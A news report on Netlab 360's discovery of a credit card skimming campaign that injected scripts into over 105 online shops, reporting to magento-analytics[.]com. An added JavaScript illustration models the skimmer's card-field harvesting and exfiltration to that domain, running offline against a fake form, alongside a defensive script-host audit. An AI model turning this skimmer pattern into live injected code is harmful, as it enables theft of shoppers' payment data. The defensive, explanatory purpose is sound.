Researchers expose mass credit card stealing campaign

Over 100 websites including top Alexa domains are infected.


A new credit card skimming scheme which involves over 100 websites is actively stealing the financial details of customers, researchers have warned.

According to Netlab 360, credit card information, including cardholder names, card numbers, expiration dates, and security codes (CVV), has been stolen over the course of five months.

Netlab 360 first flagged the suspicious domain magento-analytics[.]com back in October 2018 and has been tracking it since. At the time, traffic to the domain was rather low.

The domain has no connection to legitimate Magento services or websites, and it returns a 404 error if you attempt to access it directly from a browser.

However, it was not long before the researchers realized something nefarious was going on.  


Magento-analytics[.]com was registered in Panama, but it recently shifted to the US, then to Russia, and finally to China. This prompted the team to investigate the domain's purpose, and they found a range of JavaScript files used to skim financial data.

The scripts are all similar and simple, containing little more than a timer, a TrySend function that reads the credit card fields entered on the checkout page, and a SendData call that reports the harvested data to the operator's command-and-control (C2) server.

[Screenshot of one of the skimming scripts. Image: Netlab 360]
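The following is an added illustration, not code from Netlab 360's report or from the skimmer itself: a compressed model of the timer, TrySend and SendData structure described above, run against a constructed fake checkout form so it needs no browser or network, followed by a defensive audit that lists the hosts of every external script on a page. The field names, the shop origin and the sample page are assumptions; the audit goes beyond the article by showing one way a site owner would spot an injected loader like this one.

```javascript
// Added illustration, not code from Netlab 360's report or from the skimmer:
// a model of the timer -> TrySend -> SendData structure, run against a
// constructed fake checkout form, plus a defensive audit of <script src> hosts.
// Field names, the shop origin and the sample page are assumptions.

// Stand-in for a checkout form; value(name) plays the role of
// document.getElementById(name).value in a real skimmer.
function makeForm(values) {
  return { values, value(name) { return this.values[name] || ''; } };
}

// Assumed field names, modelled on a Magento checkout form.
const CARD_FIELDS = ['cc_number', 'cc_exp_month', 'cc_exp_year', 'cc_cid', 'billing_name'];

// TrySend: harvest the card fields. Returns null until a card number and CVV are
// present, which is why the skimmer polls on a timer instead of running once.
function trySend(form) {
  const record = {};
  for (const field of CARD_FIELDS) record[field] = form.value(field);
  if (!record.cc_number || !record.cc_cid) return null;
  return record;
}

// SendData: the exfiltration step. The real script reports to its C2 over the
// network; here the "C2" is an in-memory array so the example runs offline.
const C2_URL = 'https://magento-analytics.com/'; // the domain named in the report
function sendData(record, sink) {
  sink.push({ url: C2_URL, payload: JSON.stringify(record) });
  return sink.length;
}

// The timer loop (setInterval in a real skimmer), collapsed into a function that
// walks a sequence of form snapshots and returns the index of the snapshot on
// which exfiltration first succeeded, or -1 if it never did.
function skimUntilSent(formSnapshots, sink) {
  for (let tick = 0; tick < formSnapshots.length; tick++) {
    const record = trySend(formSnapshots[tick]);
    if (record) {
      sendData(record, sink);
      return tick;
    }
  }
  return -1;
}

// Defensive audit: list every script host that is not on an allowlist of
// first-party and known-vendor hosts. Relative src values resolve against the
// (assumed) shop origin and therefore count as first-party.
function foreignScriptHosts(html, allowedHosts, shopOrigin = 'https://shop.example/') {
  const re = /<script\b[^>]*\ssrc=["']([^"']+)["']/gi;
  const found = new Set();
  let match;
  while ((match = re.exec(html)) !== null) {
    let host;
    try {
      host = new URL(match[1], shopOrigin).hostname;
    } catch (e) {
      continue; // unparsable src: skip it rather than abort the audit
    }
    if (!allowedHosts.includes(host)) found.add(host);
  }
  return [...found];
}

// Constructed checkout page: one legitimate first-party script and one injected
// loader pointing at the skimmer domain from the report.
const SAMPLE_HTML = `
<script src="/static/frontend/Magento/luma/en_US/mage/bootstrap.js"></script>
<script src="https://magento-analytics.com/5f3a.js"></script>
`;

// Constructed sequence of form snapshots: empty, partially filled, fully filled.
const SAMPLE_SNAPSHOTS = [
  makeForm({}),
  makeForm({ cc_number: '4111111111111111' }),
  makeForm({ cc_number: '4111111111111111', cc_exp_month: '12', cc_exp_year: '2021',
             cc_cid: '123', billing_name: 'Jane Doe' }),
];

const exfil = [];
console.log('exfiltrated on tick', skimUntilSent(SAMPLE_SNAPSHOTS, exfil), exfil);
console.log('foreign script hosts:', foreignScriptHosts(SAMPLE_HTML, ['shop.example']));
```

Run it with node. The skimmer model only "sends" on the third snapshot, once both the card number and the CVV are present, which is the behaviour the polling timer exists to wait for; the audit reports the injected host while the first-party script passes. In practice the same allowlist check belongs in a Content-Security-Policy with reporting, or in a synthetic monitor that loads the checkout page and compares its script sources against a known-good list.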


By tracking these scripts, Netlab 360 found that 105 domains have been injected with them, including six sites in the Alexa Top 1 million.

Victims appear to be e-commerce and retail websites including those which sell goods such as designer bags, bicycles, baby products, electronics, and wine. 


The campaign is reminiscent of Magecart, the name given to a well-known cluster of cybercriminal groups connected to credit card skimming attacks against high-profile targets including British Airways, Ticketmaster, and OXO International.

Last week, Trend Micro said one of these groups had managed to implant credit card stealing malware in 201 online stores linked to 176 colleges and universities in the US, as well as 21 academic institutions in Canada.
